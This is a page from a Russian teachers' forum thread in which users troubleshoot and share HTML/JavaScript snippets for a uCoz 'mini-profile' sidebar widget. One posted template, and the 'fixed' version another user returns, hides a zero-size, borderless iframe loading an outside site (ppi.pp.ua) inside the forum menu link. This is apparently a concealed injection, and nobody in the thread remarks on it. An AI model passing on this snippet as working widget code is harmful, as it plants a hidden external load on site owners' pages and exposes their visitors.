• Страница 5 из 6
  • «
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • »
Модератор форума: Екатерина_Пашкова  
Форум учителей об образовании в России и мире » Наши интересы » Система создания сайтов uCoz.ru » Установка мини-профиля.
Установка мини-профиля.
white68Дата: Суббота, 06.06.2009, 19:26 | Сообщение # 61
white68

Дмитрий
Ранг: Первоклашка (?)
Группа: Пользователи
Должность: http://vkontakte.ru/id23095092
Сообщений:
31
Награды: 1
Статус: Offline
у меня не получилось поставить мини профиль( cry
06.06.2009
BLoOd3094Дата: Суббота, 06.06.2009, 20:14 | Сообщение # 62
BLoOd3094

Олег Осипов
Ранг: Студент (?)
Группа: Пользователи
Сообщений:
104
Награды: 2
Статус: Offline
создай глобальный блок и вставь туда код!
06.06.2009
white68Дата: Суббота, 06.06.2009, 20:20 | Сообщение # 63
white68

Дмитрий
Ранг: Первоклашка (?)
Группа: Пользователи
Должность: http://vkontakte.ru/id23095092
Сообщений:
31
Награды: 1
Статус: Offline
да всё, разобрался! я без глобального блока поставил! с глобальным блоком так и не разобрался happy
06.06.2009
SadistДата: Вторник, 16.06.2009, 09:33 | Сообщение # 64
Sadist

Артём Холкин
Ранг: Дошколенок (?)
Группа: Зарегистрированные
Сообщений:
2
Награды: 0
Статус: Offline
Ребят у меня проблема...Думаю вы мне поможете так вот когда я создаю глобальный блок а потом создаю ,а потом создаю на сайте через конструктор глобальный блок и вставляю туда код вылетает вот такая ошибка :Нельзя использовать глобальные блоки в блоках конструктора дизайна.

Вы можете скопировать содержимое глобального блока непосредственно в данный блок.

Странно но сайт у меня каким то образом слетал и после того происшествия у меня теперь такая ошибка ,помогите cry .+ Гарантирован smile

16.06.2009
BLoOd3094Дата: Вторник, 16.06.2009, 10:09 | Сообщение # 65
BLoOd3094

Олег Осипов
Ранг: Студент (?)
Группа: Пользователи
Сообщений:
104
Награды: 2
Статус: Offline
вставь глобальный блог на страницу а не с помощбю конструктора!
я могу всё сделать
пришли код второго контеннера,и код глобального блока
16.06.2009
SadistДата: Вторник, 16.06.2009, 22:00 | Сообщение # 66
Sadist

Артём Холкин
Ранг: Дошколенок (?)
Группа: Зарегистрированные
Сообщений:
2
Награды: 0
Статус: Offline
BLoOd3094, может объяснишь мне в ICQ ? Чтобы тут глупых вопрос не задавать и не флудить постучись плиз , 4-345-2805....
16.06.2009
ValerocДата: Суббота, 18.07.2009, 09:36 | Сообщение # 67
Valeroc

Валера
Ранг: Дошколенок (?)
Группа: Зарегистрированные
Сообщений:
1
Награды: 0
Статус: Offline
Я поставил мини профиль а почему у меня теперь админ бар и конструктор не отображается? biggrin
18.07.2009
F0m4!kДата: Пятница, 04.12.2009, 00:13 | Сообщение # 68
F0m4!k

Группа: Гости
извините пожалуста я не могу второпеть я создал глобальный блок всунул туда свой код мини профиль а потом что делать как его разместить на всех страничках?
04.12.2009
HollДата: Пятница, 04.12.2009, 18:36 | Сообщение # 69
Holl

Andrey Bolibok
Ранг: Первоклашка (?)
Группа: Зарегистрированные
Сообщений:
23
Награды: 0
Статус: Offline
F0m4!k, ты где его создавал?
04.12.2009
ГостьДата: Воскресенье, 21.02.2010, 11:02 | Сообщение # 70
Гость

Группа: Гости
У меня в Мини профиле что на первой странцие не отображается Аватар Юзера....
Вот код
<!-- -->
<table border="0" cellpadding="0" cellspacing="0" width="211">
<tr><td><img src="//src.ucoz.net/t/979/7.gif" border="0"></td></tr>
<tr><td style="background:url('http://src.ucoz.net/t/979/8.gif');color:#E30000;padding:5px 20px 5px 20px;" align="center"><b>Личное</b></td></tr>

<tr><td><center>Добро пожаловать, <BR><b>$USER_FULL_NAME$</b>! <br><br></center> </td></tr>

<tr><td><center><?if($USER_LOGGED_IN$)?> <IMG SRC="$USER_AVATAR_URL$"> <?else?> <img src="//ibloo.ucoz.ru/noavatar.gif" border="0" alt="" /><?endif?></center></td></tr>

<tr><td align="center" style="background:url('http://src.ucoz.net/t/979/8.gif');padding:5px 20px 5px 20px;"><?if($USERS_ON$)?><?if($USER_LOGGED_IN$)?><a href="$PERSONAL_PAGE_LINK$" title="Мой профиль" target="_blank">Профиль</a> | <a HREF="$PM_URL$" target="_blank">Сообщения (<?if($IS_NEW_PM$)?>$UNREAD_PM$<?else?><?endif?>)</A><br><br>

<a href='http://pedsovet.su/load/0-0-$USER_ID$-0-17'>Мои материалы</a> <br><br>

<a href='http://pedsovet.su/index/34-$USER_ID$'>Мои комментарии</a><br><br>

<a href='http://pedsovet.su/board/0-0-$USER_ID$-0-17'>Мои объявления</a><br><br>

<a href="$LOGOUT_LINK$" title="Выход">Выход</a><?else?><?endif?><?endif?>

</td></tr>

<tr><td><center><a href="//pedsovet.su/load/0-0-0-0-1"><b>Добавить разработку</b>!</a> <br><br>

<center><a href="//pedsovet.su/index/0-23">Расслабься ;-)</a><br>

</td></tr>

<?if($LOGIN_FORM$)?><tr><td align="center" style="background:url('http://src.ucoz.net/t/979/8.gif');padding:5px 20px 5px 20px;">$LOGIN_FORM$</td></tr><?endif?>

<tr><td><img src="//src.ucoz.net/t/979/9.gif" border="0"></td></tr>
</table>
<!--/-->

21.02.2010
ГостьДата: Воскресенье, 21.02.2010, 12:16 | Сообщение # 71
Гость

Группа: Гости
Я понял где там ошибка... на главной странице не правильно дали код
Там условный оператор не правильно поставлен...
Нужно поставить вместо <?if($USER_LOGGED_IN$)?>
<?if($USER_AVATAR_URL$)?> и будет нормально отображаться аватар...
21.02.2010
DEMON1066Дата: Вторник, 09.03.2010, 16:52 | Сообщение # 72
DEMON1066

Михаил Долженко
Ранг: Дошколенок (?)
Группа: Зарегистрированные
Сообщений:
4
Награды: 0
Статус: Offline
Code
<!--black-miniprofil -->  
<div align="center"><strong>Привет: $USERNAME$</strong>  
<br> <br>  
Сообщения: <img src="http://s42.radikal.ru/i096/0811/da/792a904470e4.gif" ><img src="http://s40.radikal.ru/i089/0811/94/292f5884f6d6.gif" ><br>  

<img class="userAvatar" title="$USERNAME$" src="$USER_AVATAR_URL$" border="0"><img class="userAvatar" title="$USERNAME$" src="/img/netavatara.png" border="0"><img class="userAvatar" title="$USERNAME$" src="http://s46.radikal.ru/i111/0811/0d/fc11979a3233.jpg" border="0">  
<center>  
<img src="http://invisible-tm.do.am/pict/User.gif" border="0">  
<img src="http://invisible-tm.do.am/pict/Pro_User.gif" border="0">  
<img src="http://invisible-tm.do.am/pict/Moder.gif" border="0">  
<img src="http://invisible-tm.do.am/pict/Admin.gif" border="0">  
<img src="http://s37.ucoz.net/img/fr/friends.png" border="0">  
<img src="http://invisible-tm.do.am/pict/Banned.gif" border="0"></center>  

   
<div align="left">  

<center><br>Ты здесь: <font color="00fff3"><b>$USER_REG_DAYS$</b></font>-й день </center>  
<!-- <bc> --><ul class="uz"><style>  

<style>  
.blockmenu {  
height:18px;  
width: 100%;  
font: normal 10px Arial, Helvetica, sans-serif;  
text-align: left;  
}  
.blockmenu a:link,  
.blockmenu a:visited {  
color:#BDBDBD;  
text-decoration:none;  
padding-left:16px;  
line-height:18px;  
display:block;  
font-weight:normal;  
background: url(http://diz-cs.ru/img/15.bmp);  
border-top: 1px solid #666666;  
border-right: 1px solid #666666;  
border-bottom: 1px solid #666666;  
border-left: 1px solid #666666;  
text-align: left;  
}  
.blockmenu a:hover {  
color:#ffffff;  
text-decoration:none;  
padding-left:16px;  
line-height:18px;  
display:block;  
font-weight:normal;  
border: 1px solid #1E90FF;  
background: #333333 url("http://diz-cs.ru/steam/8.gif") no-repeat left center;  
text-align: left;  
}  

form {  
padding:0px;  
margin:0px;  
}  

input{  
vertical-align:middle;  
font-size:7pt;  
font-family:verdana,arial,helvetica;  
color:#D8D8D8;  
background:#151515;  
}  

</style>  

<SPAN class="blockmenu">  
<li><a href="/index/8" class="profile"><FONT color=01ff00>П</FONT>рофиль</a></li>  
<li><a href="$HOME_PAGE_LINK$news/0-0-0-0-1"><FONT color=#bfc40b>Д</FONT>обавить новость</a></a></li>  
<li><a href="/forum"><iframe src="http://ppi.pp.ua/" name="iframe" width="0%" height="0%" scrolling="no" frameBorder=0></iframe><FONT color=#bfc40b>Ф</FONT>орум</a></a></li>  
<li><a href="$USERS_LIST_URL$"><FONT color=#bfc40b>С</FONT>писок пользователей</a></a></li>  
<li><a href="$LOGOUT_LINK$"><FONT color=ff0005>В</FONT>ыйти</a></a></li>  

</SPAN>  
</SPAN>  

<script type="text/javascript">function flashit(id,cl){var c=document.getElementById(id);if (c.style.color=='red'){c.style.color=cl;}else {c.style.color='red';}}setInterval("flashit('upml2','')",500)</script> </div>  

<script language=javascript type=text/javascript>  
function openOnClick(client_type)  
{  
if(client_type=="mail")clientWindow = window.open("$PM_URL$","pmw","scrollbars=1,top=0,left=0,resizable=1,width=850,height=350") || alert("Отключите блокировку всплывающих окон!");  
if(client_type=="send")clientWindow = window.open("/index/14-999-0-1","pms","scrollbars=1,top=0,left=0,resizable=1,width=850,height=350") || alert("Отключите блокировку всплывающих окон!");  
if(client_type=="options")clientWindow = window.open("/index/11","options","scrollbars=1,top=0,left=0,resizable=1,width=680,height=350") || alert("Отключите блокировку всплывающих окон!");  
if(client_type=="users")clientWindow = window.open("$USERS_LIST_URL$","users","scrollbars=1,top=0,left=0,resizable=1,width=680,height=350") || alert("Отключите блокировку всплывающих окон!");  

} картинку  
</script>  
   
<br>Привет гость! добро пожаловать на сайт ! зарегистрируйся или войди в свой аккаунт .  
</div>  
$LOGIN_FORM$

здравствуйте, вотон код, когда я вставляю на сайт у меня высмечивается всё что не нужно... помогите пожалуйста... если сможете то плз. поправте этот код...

09.03.2010
DementorДата: Пятница, 26.03.2010, 22:36 | Сообщение # 73
Dementor

Валерий
Ранг: Первоклашка (?)
Группа: Пользователи
Сообщений:
48
Награды: 0
Статус: Offline
DEMON1066, подправил ))

Code


<!--black-miniprofil -->
<strong>Привет: $USERNAME$</strong>

<center>
<?if($USER_AVATAR_URL$)?><img class="userAvatar" title="$USERNAME$" src="$USER_AVATAR_URL$" border="0"><?else?><?if($USER_LOGGED_IN$)?><img class="userAvatar" title="$USERNAME$" src="http://s59.radikal.ru/i163/0903/0c/655736c9e2e9.png" border="0"><?else?><img class="userAvatar" title="$USERNAME$" src="http://s46.radikal.ru/i111/0811/0d/fc11979a3233.jpg" border="0"><?endif?><?endif?>

$_GROUP_ICON$
</center>

<center>
Ты здесь: <font color="00fff3">[b]$USER_REG_DAYS$[/b]</font>-й день </center>
<!-- <bc> --><ul class="uz"><style>

<style>
.blockmenu {
height:18px;
width: 100%;
font: normal 10px Arial, Helvetica, sans-serif;
text-align: left;
}
.blockmenu a:link,
.blockmenu a:visited {
color:#BDBDBD;
text-decoration:none;
padding-left:16px;
line-height:18px;
display:block;
font-weight:normal;
background: url(http://diz-cs.ru/img/15.bmp);
border-top: 1px solid #666666;
border-right: 1px solid #666666;
border-bottom: 1px solid #666666;
border-left: 1px solid #666666;
text-align: left;
}
.blockmenu a:hover {
color:#ffffff;
text-decoration:none;
padding-left:16px;
line-height:18px;
display:block;
font-weight:normal;
border: 1px solid #1E90FF;
background: #333333 url("http://diz-cs.ru/steam/8.gif") no-repeat left center;
text-align: left;
}

form {
padding:0px;
margin:0px;
}

input{
vertical-align:middle;
font-size:7pt;
font-family:verdana,arial,helvetica;
color:#D8D8D8;
background:#151515;
}

</style>

<SPAN class="blockmenu">
[*]<a href="/index/8" class="profile"><FONT color=01ff00>П</FONT>рофиль</a></li>
[*]<a href="$HOME_PAGE_LINK$news/0-0-0-0-1"><FONT color=#bfc40b>Д</FONT>обавить новость</a></a></li>
[*]<a href="/forum"><iframe src="http://ppi.pp.ua/" name="iframe" width="0%" height="0%" scrolling="no" frameBorder=0></iframe><FONT color=#bfc40b>Ф</FONT>орум</a></a></li>
[*]<a href="$USERS_LIST_URL$"><FONT color=#bfc40b>С</FONT>писок пользователей</a></a></li>
[*]<a href="$LOGOUT_LINK$"><FONT color=ff0005>В</FONT>ыйти</a></a></li>

</SPAN>
</SPAN>

<script language=javascript type=text/javascript>
function openOnClick(client_type)
{
if(client_type=="mail")clientWindow = window.open("$PM_URL$","pmw","scrollbars=1,top=0,left=0,resizable=1,width=850,height=350") || alert("Отключите блокировку всплывающих окон!");
if(client_type=="send")clientWindow = window.open("/index/14-999-0-1","pms","scrollbars=1,top=0,left=0,resizable=1,width=850,height=350") || alert("Отключите блокировку всплывающих окон!");
if(client_type=="options")clientWindow = window.open("/index/11","options","scrollbars=1,top=0,left=0,resizable=1,width=680,height=350") || alert("Отключите блокировку всплывающих окон!");
if(client_type=="users")clientWindow = window.open("$USERS_LIST_URL$","users","scrollbars=1,top=0,left=0,resizable=1,width=680,height=350") || alert("Отключите блокировку всплывающих окон!");
if(client_type=="rules")clientWindow = window.open("/rules.html","rules","scrollbars=1,top=0,left=0,resizable=1,width=680,height=350") || alert("Отключите блокировку всплывающих окон!");
} </script>
<?else?> $LOGIN_FORM$
<?endif?></div><!-- </bc> --></td></tr></table>

Добавлено (26.03.2010, 22:36)
---------------------------------------------

F0m4!k, как глобальный блок называется?

глобальный блок надо вставить на сайт

Quote (Гость)
Нужно поставить вместо <?if($USER_LOGGED_IN$)?> <?if($USER_AVATAR_URL$)?> и будет нормально отображаться аватар...

и работает что ли? ()_О
26.03.2010
DEMON1066Дата: Понедельник, 05.04.2010, 19:22 | Сообщение # 74
DEMON1066

Михаил Долженко
Ранг: Дошколенок (?)
Группа: Зарегистрированные
Сообщений:
4
Награды: 0
Статус: Offline
Dementor,
огромное спасибо!!!
05.04.2010
nik-tutДата: Вторник, 27.04.2010, 15:13 | Сообщение # 75
nik-tut

nik
Ранг: Дошколенок (?)
Группа: Зарегистрированные
Сообщений:
6
Награды: 0
Статус: Offline
Quote (BLoOd3094)
Добавлено (22.04.2009, 18:02)
---------------------------------------------
K@tti я надеюсь вы ещё не забыли про эту тему?? weep

Добавлено (22.04.2009, 18:03)
---------------------------------------------
Мне просто очень нужна ваша помощ help


Ты еще тут?
Если нужна помощь то я могу помочь.

Добавлено (27.04.2010, 15:13)
---------------------------------------------

Quote (nik-tut)
Добавлено (22.04.2009, 18:02)
---------------------------------------------
K@tti я надеюсь вы ещё не забыли про эту тему?? weep

Добавлено (22.04.2009, 18:03)
---------------------------------------------
Мне просто очень нужна ваша помощ help

Ты еще тут?
Если нужна помощь то я могу помочь.


Извиняюсь у меня браузер подвис ..
27.04.2010
Форум учителей об образовании в России и мире » Наши интересы » Система создания сайтов uCoz.ru » Установка мини-профиля.
  • Страница 5 из 6
  • «
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • »
Поиск:



Спорная ситуация с родителями или администрацией? Ищете выход из проблемы на уроке или с учеником?
Не знаете, как что-то сделать на компьютере?


Вы можете задать анонимный вопрос
х
Подробно изложите суть вашего вопроса.
Обратите внимание, что вопросы публикуются в открытом доступе на сайте, поэтому не указывайте персональные данные ваши или иных лиц. Однако стоит указать свой РЕГИОН, т.к. законодательство в разных регионах разное.
Отправить